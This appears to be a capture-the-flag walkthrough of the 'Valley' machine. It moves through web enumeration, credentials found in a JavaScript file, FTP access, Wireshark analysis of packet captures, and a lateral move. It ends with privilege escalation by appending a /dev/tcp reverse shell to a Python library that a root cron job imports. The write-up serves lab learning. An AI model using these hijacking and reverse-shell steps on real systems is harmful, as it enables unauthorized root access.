Valley CTF

HTTP and FTP Enumeration - Wireshark Analysis - Lateral Move - CronJob PrivEsc

Scanning

Starting off with the nmap scan

• The SSH doesn't seems to be vulnerable - Need potential credentials to login

• Need to enumerate the HTTP port - by finding some hidden directories

• If we find some valid credentials, we can logon to FTP for further enumeration

Enumeration and Foothold

On checking the website hosted on the IP, we get two endpoints gallery and pricing

• Visiting the gallery endpoint and clicking on an image - redirects to /static endpoint with the index of the image followed by it !

Let's find some hidden files on the website for the /static endpoint

• /00 looks interesting - On visiting it !

dev notes from valleyDev:
-add wedding photo examples
-redo the editing on #4
-remove /dev1243224123123
-check for SIEM alerts

We found another directory /dev1243224123123 - Let's visit that

• Tried all default credentials and bruteforcing for some potential credentials but it's of no use

• Viewed the source page and found an interesting .js file - dev.js

if (username === "siemDev" && password === "california") {
        window.location.href = "/dev1243224123123/devNotes37370.txt";
    } else {
        loginErrorMsg.style.opacity = 1;
    }

Found valid credentials embedded inside the js file in plain text - Loggin in gives us another note

dev notes for ftp server:
-stop reusing credentials
-check for any vulnerabilies
-stay up to date on patching
-change ftp port to normal port

Let's reuse the credentials to connect with the FTP server and continue our enumeration

Cool, we have some .pcapng files - Let's examine that with Wireshark and see how the data travels

• siemFTP and siemHTTP1 din't have anything useful but siemHTTP2 had a POST request on the index.html endpoint - which means there are chances of passing the credentials in plain text

Let's SSH into the machine and get a shell and grab the user.txt

Lateral Movement

We find another executable file called valleyAuthenticator, let's tranfer the file and examine it using strings

valley:liberty123

Let's SSH again with the above creds as the valley user !

Privilege Escalation

If we examine the /etc/crontab file, we see there is python file photosEncrypt.py which uses file base64 python module

The python file basically just encrypts the photos using the Base64 module and outputs it - It's run as root

• So it imports the base64 module file, what if we can append our reverse shell ? Do we have write permissions?

I checked the permissions on the file /usr/lib/python3.8/base64.py and it was owned by root and ValleyAdmin group - and the user valley is a part of the ValleyAdmin group !

Another way would be !

find / -writable 2>/dev/null | grep "python"
/usr/lib/python3.8
/usr/lib/python3.8/base64.py

Let's add our reverse shell into this file and meanwhile start a listener !

$ cat >> /usr/lib/python3.8/base64.py
import re
import struct
import binascii
import os

os.system('/bin/bash -c \'bash -i >& /dev/tcp/10.10.11.84/4444 0>&1\'')

:)